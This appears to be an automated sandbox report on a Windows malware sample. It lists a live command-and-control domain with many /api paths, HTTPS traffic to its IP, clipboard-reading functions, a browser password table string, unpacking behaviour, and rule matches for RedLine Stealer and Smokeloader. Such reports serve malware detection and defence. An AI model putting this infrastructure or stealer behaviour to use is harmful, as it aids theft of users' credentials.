Source: file.exe, 00000000.00000003.1682044999.000000000420D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1681704973.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692214751.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1682461997.000000000420D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1681988737.0000000004209000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692107511.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/7%
Source: file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/9
Source: file.exe, 00000000.00000003.1673421528.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/:&
Source: file.exe, 00000000.00000003.1701771883.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1701569967.000000000420C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1701526477.0000000004209000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/C
Source: file.exe, 00000000.00000003.1673421528.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/C%a
Source: file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/Q
Source: file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/a
Source: file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1681704973.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693164585.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692214751.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692613094.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692326978.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1693380169.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692443580.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692107511.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692942051.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/api
Source: file.exe, 00000000.00000002.1890474454.0000000001B28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/apiwxt
Source: file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/c
Source: file.exe, 00000000.00000003.1673421528.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/d
Source: file.exe, 00000000.00000003.1692214751.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692613094.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692326978.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692443580.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692107511.000000000420F000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1692942051.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/e
Source: file.exe, 00000000.00000003.1664402054.0000000001ACB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/gC
Source: file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/h
Source: file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1691955412.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/m
Source: file.exe, 00000000.00000003.1681704973.0000000004208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/n
Source: file.exe, 00000000.00000003.1733642264.0000000004208000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1891077246.0000000004208000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://strollheavengwu.shop/s
Source: file.exe, 00000000.00000003.1664641169.000000000425F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.microsof
Source: file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.1664641169.000000000425D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: file.exe, 00000000.00000003.1664641169.000000000425D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1691890634.000000000420B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: file.exe, 00000000.00000003.1665105671.0000000004248000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.1683395578.000000000432C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.15.198:443 -> 192.168.2.4:49737 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042D8F0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_0042D8F0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042D8F0 GetWindowInfo,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

0_2_0042D8F0

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1890444980.0000000001A6F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00421370	0_2_00421370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004046D0	0_2_004046D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00420C42	0_2_00420C42
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00406030	0_2_00406030
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00421090	0_2_00421090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426097	0_2_00426097
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00410140	0_2_00410140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00426148	0_2_00426148
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004261C3	0_2_004261C3
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004261D5	0_2_004261D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403492	0_2_00403492
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405567	0_2_00405567
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004365C0	0_2_004365C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004065F0	0_2_004065F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403670	0_2_00403670
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B6A0	0_2_0043B6A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040581F	0_2_0040581F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00433950	0_2_00433950
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043B9D0	0_2_0043B9D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004069B4	0_2_004069B4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00405B18	0_2_00405B18
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041DB22	0_2_0041DB22
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407C70	0_2_00407C70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00403CEF	0_2_00403CEF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402EC0	0_2_00402EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036A63AF	0_2_036A63AF
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036903A7	0_2_036903A7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036A62FE	0_2_036A62FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03686297	0_2_03686297
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03683127	0_2_03683127
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03683517	0_2_03683517
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036855DB	0_2_036855DB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036A15D7	0_2_036A15D7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036A642A	0_2_036A642A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036A643C	0_2_036A643C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036B3BB7	0_2_036B3BB7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03684937	0_2_03684937
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036BB907	0_2_036BB907
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036B6827	0_2_036B6827
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03683F47	0_2_03683F47
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_03687ED7	0_2_03687ED7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_036BBC37	0_2_036BBC37

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 03688957 appears 34 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 03690547 appears 188 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004102E0 appears 188 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 004086F0 appears 34 times

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 488

Source: file.exe, 00000000.00000002.1890172395.0000000001A15000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFires0 vs file.exe
Source: file.exe	Binary or memory string: OriginalFilenameFires0 vs file.exe

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1890444980.0000000001A6F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.1890767456.0000000003680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/9@1/1

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_01A7059E CreateToolhelp32Snapshot,Module32First,

0_2_01A7059E

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004286B8 CoCreateInstance,

0_2_004286B8

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4192

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d38402d2-ec4a-48d7-9432-d16b9626ef75

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000003.1665217994.0000000004205000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1664759607.0000000004235000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: file.exe	ReversingLabs: Detection: 44%
Source: file.exe	Virustotal: Detection: 47%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 488
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 1552

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\motozakaroser-nuxowarosa\hic27\bivutunub.pdb source: file.exe
Source:	Binary string: H"C:\motozakaroser-nuxowarosa\hic27\bivutunub.pdb source: file.exe

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01A760B3 push es; iretd		0_2_01A760C5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01A760C8 push esi; retf		0_2_01A760CC

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
